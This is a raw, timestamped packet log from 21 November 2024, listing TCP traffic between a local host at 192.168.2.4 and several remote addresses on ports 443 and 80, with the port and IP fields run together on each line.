                                                                                                                                      Nov 21, 2024 10:36:52.251265049 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.251405001 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.251466036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.255661011 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.255717039 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.255980015 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.256037951 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.260344982 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.260401964 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.265008926 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.265069008 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.265093088 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.265137911 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.265552044 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.265599012 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.269660950 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.269717932 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.270231009 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.270275116 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.274221897 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.274277925 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.274478912 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.274528980 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.278736115 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.278806925 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.280168056 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.280217886 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.283752918 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.283808947 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.287925959 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.287990093 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.288144112 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.288189888 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.292862892 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.292932987 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.293147087 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.293194056 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.297074080 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.297137022 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.384835958 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.384917974 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.386126995 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.386179924 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.386342049 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.386390924 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.390280008 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.390322924 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.390454054 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.390499115 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.394741058 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.394788027 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.395270109 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.395323992 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.399884939 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.399936914 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.403515100 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.403574944 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.403712034 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.403755903 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.407793045 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.407844067 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.408612013 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.408680916 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.412175894 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.412225008 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.412555933 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.412601948 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.416603088 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.416656017 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.416891098 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.416939974 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.421050072 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.421104908 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.425421000 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.425491095 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.425707102 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.425757885 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.429785013 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.429842949 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.429929972 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.429975033 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.432955027 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.433017015 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.433087111 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.433134079 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.436647892 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.436703920 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.439433098 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.439486027 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.439560890 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.439606905 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.442683935 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.442735910 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.442760944 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.442811012 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.445892096 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.445943117 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.445980072 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.446021080 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.449158907 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.449206114 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.452213049 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.452260017 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.452527046 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.452693939 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.455475092 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.455529928 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.455559969 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.455606937 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.458916903 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.458967924 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.459181070 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.459225893 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.461899042 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.461947918 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.462436914 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.462486029 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.465365887 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.465416908 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.468350887 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.468400955 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.468628883 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.468674898 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.471590996 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.471645117 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.472527027 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.472573996 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.474771023 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.474816084 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.475507975 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.475553036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.478333950 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.478379965 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.481224060 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.481275082 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.481504917 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.481551886 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.484462976 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.484508038 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.485023022 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.485064030 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.487610102 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.487656116 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.490830898 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.490900993 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.491111994 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.491153002 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.494162083 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.494210958 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.494308949 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.494354963 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.497298002 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.497349977 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.497858047 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.497905016 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.500494003 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.500541925 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.500662088 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.500705004 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.503704071 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.503751993 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.504127979 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.504174948 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.507615089 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.507666111 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.510494947 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.510543108 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.511032104 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.511091948 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.513422966 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.513470888 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.513506889 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.513556004 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.516590118 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.516638041 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.519771099 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.519824982 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.519972086 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.520015001 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.522979975 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.523031950 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.523442030 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.523595095 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.526560068 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.526627064 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.526690960 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.526736021 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.529347897 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.529400110 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.532592058 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.532639980 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.532740116 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.532787085 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.535448074 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.535496950 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.535865068 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.535912037 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.538500071 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.538556099 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.538750887 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.538799047 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.541516066 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.541563034 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.544409990 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.544454098 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.544466019 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.544506073 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.595613003 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.595690966 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.596657991 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.596705914 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.596716881 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.596762896 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.599544048 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.599598885 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.599603891 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.599653959 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.602278948 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.602329969 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.602406025 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.602458954 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.606323004 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.606364965 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.608167887 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.608227968 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.608275890 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.608325005 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.625865936 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.625941038 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.626115084 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.626158953 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.626815081 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.626857996 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.627420902 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.627463102 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.629870892 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.633224964 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.633307934 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.633322954 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.633368015 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.634561062 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.634620905 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.634802103 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.634844065 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.636745930 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.636801958 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.638832092 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.640769005 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.640825033 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.640845060 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.640851974 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.640897989 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.641977072 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.643240929 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.643306971 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.643320084 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.643358946 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.643685102 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.643727064 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.644474983 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.644526005 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.644764900 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.644814014 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.645752907 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.645848036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.646907091 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.648102045 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.648150921 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.648156881 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.648195982 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.648329020 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.648367882 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.649332047 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.650998116 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.651051998 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.651058912 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.651097059 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.651864052 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.651918888 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.651946068 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.651993036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.651997089 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.652019024 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.652028084 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.652038097 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.652046919 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.652065992 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:54.723022938 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:54.844192028 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:54.847460985 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:54.847724915 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:54.969294071 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:56.266486883 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:56.270468950 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:56.391473055 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:56.732161045 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:56.775749922 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:57.236637115 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:57.236680984 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:57.236767054 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:57.238934994 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:57.238951921 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.502367020 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.502542973 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:58.506443024 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:58.506467104 CET44349739188.114.96.3192.168.2.4
